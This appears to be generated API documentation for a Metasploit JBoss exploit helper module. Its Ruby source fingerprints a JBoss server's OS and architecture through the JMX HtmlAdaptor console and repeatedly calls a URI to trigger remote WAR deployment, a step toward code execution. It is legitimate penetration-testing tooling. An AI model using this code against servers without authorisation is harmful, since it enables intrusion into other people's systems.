Module: Msf::Exploit::Remote::HTTP::JBoss::Base

Included in:
Msf::Exploit::Remote::HTTP::JBoss
Defined in:
lib/msf/core/exploit/remote/http/jboss/base.rb

Instance Method Summary collapse

Instance Method Details

#auto_target(available_targets) ⇒ Msf::Module::Target?

Try to auto detect the target architecture and platform

Parameters:

  • available_targets (Array)

    The available targets

Returns:



54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
76
77
78
79
80
# File 'lib/msf/core/exploit/remote/http/jboss/base.rb', line 54

def auto_target(available_targets)
  if http_verb == 'HEAD'
    print_status("Sorry, automatic target detection doesn't work with HEAD requests")
  else
    print_status("Attempting to automatically select a target...")
    res = query_serverinfo
    plat = detect_platform(res)
    unless plat
      print_warning('Unable to detect platform!')
      return nil
    end

    arch = detect_architecture(res)
    unless arch
      print_warning('Unable to detect architecture!')
      return nil
    end

    # see if we have a match
    available_targets.each { |t| return t if t['Platform'] == plat && t['Arch'] == arch }
  end

  # no matching target found, use Java as fallback
  java_targets = available_targets.select {|t| t.name =~ /^Java/ }

  java_targets[0]
end

#deploy(opts = {}, num_attempts = 5) ⇒ Rex::Proto::Http::Response?

Deploys a WAR through HTTP uri invoke

Parameters:

Returns:



10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
# File 'lib/msf/core/exploit/remote/http/jboss/base.rb', line 10

def deploy(opts = {}, num_attempts = 5)
  uri = opts['uri']

  if uri.blank?
    return nil
  end

  # JBoss might need some time for the deployment. Try 5 times at most and
  # wait 5 seconds in between tries
  num_attempts.times do |attempt|
    res = send_request_cgi(opts, 5)
    msg = nil
    if res.nil?
      msg = "Execution failed on #{uri} [No Response]"
    elsif res.code == 200
      vprint_status("Successfully called '#{uri}'")
      return res
    else
      msg = "http request failed to #{uri} [#{res.code}]"
    end

    if attempt < num_attempts - 1
      msg << ", retrying in 5 seconds..."
      vprint_status(msg)
      Rex.sleep(5)
    else
      print_error(msg)
      return res
    end
  end
end

#detect_architecture(res) ⇒ String?

Try to autodetect the target architecture

Parameters:

Returns:

  • (String, nil)

    The target architecture or nil



129
130
131
132
133
134
135
136
137
138
139
140
# File 'lib/msf/core/exploit/remote/http/jboss/base.rb', line 129

def detect_architecture(res)
  if res && res.body =~ /<td.*?OSArch.*?(x86_64|amd64|x86|i386|i686).*?<\/td>/m
    arch = $1
    if arch =~ /^(x86_64|amd64)$/i
      return ARCH_X64
    elsif arch =~ /^(x86|i386|i686)$/i
      return ARCH_X86
    end
  end

  nil
end

#detect_platform(res) ⇒ String?

Try to autodetect the target platform

Parameters:

Returns:

  • (String, nil)

    The target platform or nil



110
111
112
113
114
115
116
117
118
119
120
121
122
123
# File 'lib/msf/core/exploit/remote/http/jboss/base.rb', line 110

def detect_platform(res)
  if res && res.body =~ /<td.*?OSName.*?(Linux|FreeBSD|Windows).*?<\/td>/m
    os = $1
    if (os =~ /Linux/i)
      return 'linux'
    elsif (os =~ /FreeBSD/i)
      return 'linux'
    elsif (os =~ /Windows/i)
      return 'win'
    end
  end

  nil
end

#http_verbString

Provides the HTTP verb used

Returns:

  • (String)

    The HTTP verb in use



45
46
47
# File 'lib/msf/core/exploit/remote/http/jboss/base.rb', line 45

def http_verb
  datastore['VERB']
end

#query_serverinfoRex::Proto::Http::Response?

Query the server information from HtmlAdaptor

Returns:



85
86
87
88
89
90
91
92
93
94
95
96
97
98
99
100
101
102
103
104
# File 'lib/msf/core/exploit/remote/http/jboss/base.rb', line 85

def query_serverinfo
  path = normalize_uri(target_uri.path.to_s, 'HtmlAdaptor')
  res = send_request_cgi(
    {
      'uri'    => path,
      'method' => http_verb,
      'vars_get' =>
      {
        'action' => 'inspectMBean',
        'name' => 'jboss.system:type=ServerInfo'
      }
    })

  unless res && res.code == 200
    print_error("Failed: Error requesting #{path}")
    return nil
  end

  res
end